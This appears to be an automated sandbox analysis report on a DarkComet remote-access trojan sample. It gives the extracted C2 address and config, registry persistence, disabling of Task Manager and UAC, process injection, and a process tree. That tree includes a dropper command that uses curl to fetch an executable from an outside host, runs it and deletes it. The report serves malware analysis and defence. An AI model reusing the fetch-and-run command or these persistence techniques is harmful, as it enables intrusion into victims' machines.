Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2024 07:43
Static task
static1
Behavioral task
behavioral1
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
Resource
win10v2004-20241007-en
General
-
Target
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe
-
Size
5.3MB
-
MD5
c13d6d5a9aa229499ee0ff1f698a2ee0
-
SHA1
2a7ac214047525c963cfd8d1be692c50bdbb9c46
-
SHA256
03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba
-
SHA512
5c9e4b30dbd6c5414ea04a70b109e6dc9f8287affe014e47ed0797ff63ac904223751557e44bff99cf8ecfce3c8b748cef55c1d3db88905431f4049039042059
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD4:hrj30qkXnsr2YIIog7if+HJFs
Malware Config
Extracted
darkcomet
GoogleDebugger
147.185.221.24:14161
RO_MUTEX-8HU43EZ
-
InstallPath
ChromeCookies\ChromeCookie.exe
-
gencode
WN0BLB8aPxBw
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe,C:\\Windows\\TEMP\\ChromeCookies\\ChromeCookie.exe" IntelGpuUpdater.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3428 attrib.exe 3312 attrib.exe 3408 attrib.exe 3008 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 13 IoCs
pid Process 408 test.exe 384 ChromeCookie.exe 2528 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 4236 IntelGpuUpdater.exe 5112 ChromeCookie.exe 4188 IntelGpuUpdater.exe 2956 IntelGpuUpdater.exe 404 IntelGpuUpdater.exe 2508 IntelGpuUpdater.exe 4688 IntelGpuUpdater.exe 2700 IntelGpuUpdater.exe 4932 IntelGpuUpdater.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" ChromeCookie.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" iexplore.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 384 set thread context of 2428 384 ChromeCookie.exe 98 PID 5112 set thread context of 4876 5112 ChromeCookie.exe 128 -
resource yara_rule behavioral2/files/0x000b000000023b92-8.dat upx behavioral2/memory/408-10-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/384-46-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2428-47-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/384-49-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/408-52-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5112-96-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5112-99-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4236-100-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4188-102-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4188-103-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2956-105-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/404-108-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2508-110-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4688-112-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2700-114-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/4932-117-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdaterHelper.exe cmd.exe File opened for modification C:\Windows\IntelGpuUpdater.exe attrib.exe File created C:\Windows\IntelGpuUpdater.exe cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4748 sc.exe 2568 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 40 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4912 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008e8a4a6de946db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000319e3e6de946db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008e8a4a6de946db01 IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000ee27486de946db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fPasteOriginalEOL = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000002563436de946db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000ee27486de946db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe 3596 IntelGpuUpdaterHelper.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 408 test.exe Token: SeSecurityPrivilege 408 test.exe Token: SeTakeOwnershipPrivilege 408 test.exe Token: SeLoadDriverPrivilege 408 test.exe Token: SeSystemProfilePrivilege 408 test.exe Token: SeSystemtimePrivilege 408 test.exe Token: SeProfSingleProcessPrivilege 408 test.exe Token: SeIncBasePriorityPrivilege 408 test.exe Token: SeCreatePagefilePrivilege 408 test.exe Token: SeBackupPrivilege 408 test.exe Token: SeRestorePrivilege 408 test.exe Token: SeShutdownPrivilege 408 test.exe Token: SeDebugPrivilege 408 test.exe Token: SeSystemEnvironmentPrivilege 408 test.exe Token: SeChangeNotifyPrivilege 408 test.exe Token: SeRemoteShutdownPrivilege 408 test.exe Token: SeUndockPrivilege 408 test.exe Token: SeManageVolumePrivilege 408 test.exe Token: SeImpersonatePrivilege 408 test.exe Token: SeCreateGlobalPrivilege 408 test.exe Token: 33 408 test.exe Token: 34 408 test.exe Token: 35 408 test.exe Token: 36 408 test.exe Token: SeIncreaseQuotaPrivilege 384 ChromeCookie.exe Token: SeSecurityPrivilege 384 ChromeCookie.exe Token: SeTakeOwnershipPrivilege 384 ChromeCookie.exe Token: SeLoadDriverPrivilege 384 ChromeCookie.exe Token: SeSystemProfilePrivilege 384 ChromeCookie.exe Token: SeSystemtimePrivilege 384 ChromeCookie.exe Token: SeProfSingleProcessPrivilege 384 ChromeCookie.exe Token: SeIncBasePriorityPrivilege 384 ChromeCookie.exe Token: SeCreatePagefilePrivilege 384 ChromeCookie.exe Token: SeBackupPrivilege 384 ChromeCookie.exe Token: SeRestorePrivilege 384 ChromeCookie.exe Token: SeShutdownPrivilege 384 ChromeCookie.exe Token: SeDebugPrivilege 384 ChromeCookie.exe Token: SeSystemEnvironmentPrivilege 384 ChromeCookie.exe Token: SeChangeNotifyPrivilege 384 ChromeCookie.exe Token: SeRemoteShutdownPrivilege 384 ChromeCookie.exe Token: SeUndockPrivilege 384 ChromeCookie.exe Token: SeManageVolumePrivilege 384 ChromeCookie.exe Token: SeImpersonatePrivilege 384 ChromeCookie.exe Token: SeCreateGlobalPrivilege 384 ChromeCookie.exe Token: 33 384 ChromeCookie.exe Token: 34 384 ChromeCookie.exe Token: 35 384 ChromeCookie.exe Token: 36 384 ChromeCookie.exe Token: SeIncreaseQuotaPrivilege 2428 iexplore.exe Token: SeSecurityPrivilege 2428 iexplore.exe Token: SeTakeOwnershipPrivilege 2428 iexplore.exe Token: SeLoadDriverPrivilege 2428 iexplore.exe Token: SeSystemProfilePrivilege 2428 iexplore.exe Token: SeSystemtimePrivilege 2428 iexplore.exe Token: SeProfSingleProcessPrivilege 2428 iexplore.exe Token: SeIncBasePriorityPrivilege 2428 iexplore.exe Token: SeCreatePagefilePrivilege 2428 iexplore.exe Token: SeBackupPrivilege 2428 iexplore.exe Token: SeRestorePrivilege 2428 iexplore.exe Token: SeShutdownPrivilege 2428 iexplore.exe Token: SeDebugPrivilege 2428 iexplore.exe Token: SeSystemEnvironmentPrivilege 2428 iexplore.exe Token: SeChangeNotifyPrivilege 2428 iexplore.exe Token: SeRemoteShutdownPrivilege 2428 iexplore.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2428 iexplore.exe 4876 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1868 wrote to memory of 1444 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 84 PID 1868 wrote to memory of 1444 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 84 PID 1868 wrote to memory of 1444 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 84 PID 1444 wrote to memory of 4808 1444 cmd.exe 85 PID 1444 wrote to memory of 4808 1444 cmd.exe 85 PID 1444 wrote to memory of 4808 1444 cmd.exe 85 PID 1868 wrote to memory of 4092 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 1868 wrote to memory of 4092 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 1868 wrote to memory of 4092 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 86 PID 4092 wrote to memory of 4280 4092 cmd.exe 87 PID 4092 wrote to memory of 4280 4092 cmd.exe 87 PID 4092 wrote to memory of 4280 4092 cmd.exe 87 PID 4280 wrote to memory of 376 4280 cmd.exe 88 PID 4280 wrote to memory of 376 4280 cmd.exe 88 PID 4280 wrote to memory of 376 4280 cmd.exe 88 PID 4280 wrote to memory of 408 4280 cmd.exe 89 PID 4280 wrote to memory of 408 4280 cmd.exe 89 PID 4280 wrote to memory of 408 4280 cmd.exe 89 PID 4280 wrote to memory of 4912 4280 cmd.exe 90 PID 4280 wrote to memory of 4912 4280 cmd.exe 90 PID 4280 wrote to memory of 4912 4280 cmd.exe 90 PID 408 wrote to memory of 4408 408 test.exe 91 PID 408 wrote to memory of 4408 408 test.exe 91 PID 408 wrote to memory of 4408 408 test.exe 91 PID 408 wrote to memory of 1392 408 test.exe 93 PID 408 wrote to memory of 1392 408 test.exe 93 PID 408 wrote to memory of 1392 408 test.exe 93 PID 4408 wrote to memory of 3408 4408 cmd.exe 95 PID 4408 wrote to memory of 3408 4408 cmd.exe 95 PID 4408 wrote to memory of 3408 4408 cmd.exe 95 PID 1392 wrote to memory of 3312 1392 cmd.exe 96 PID 1392 wrote to memory of 3312 1392 cmd.exe 96 PID 1392 wrote to memory of 3312 1392 cmd.exe 96 PID 408 wrote to memory of 384 408 test.exe 97 PID 408 wrote to memory of 384 408 test.exe 97 PID 408 wrote to memory of 384 408 test.exe 97 PID 384 wrote to memory of 2428 384 ChromeCookie.exe 98 PID 384 wrote to memory of 2428 384 ChromeCookie.exe 98 PID 384 wrote to memory of 2428 384 ChromeCookie.exe 98 PID 384 wrote to memory of 2428 384 ChromeCookie.exe 98 PID 384 wrote to memory of 2428 384 ChromeCookie.exe 98 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 2428 wrote to memory of 4720 2428 iexplore.exe 99 PID 1868 wrote to memory of 1128 1868 03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe 103 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3312 attrib.exe 3408 attrib.exe 3008 attrib.exe 3428 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe"C:\Users\Admin\AppData\Local\Temp\03428e1b9f524d36ba8363eacfed20aee9a03651e0f85827b6d5452b6e4c84ba.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:376
-
-
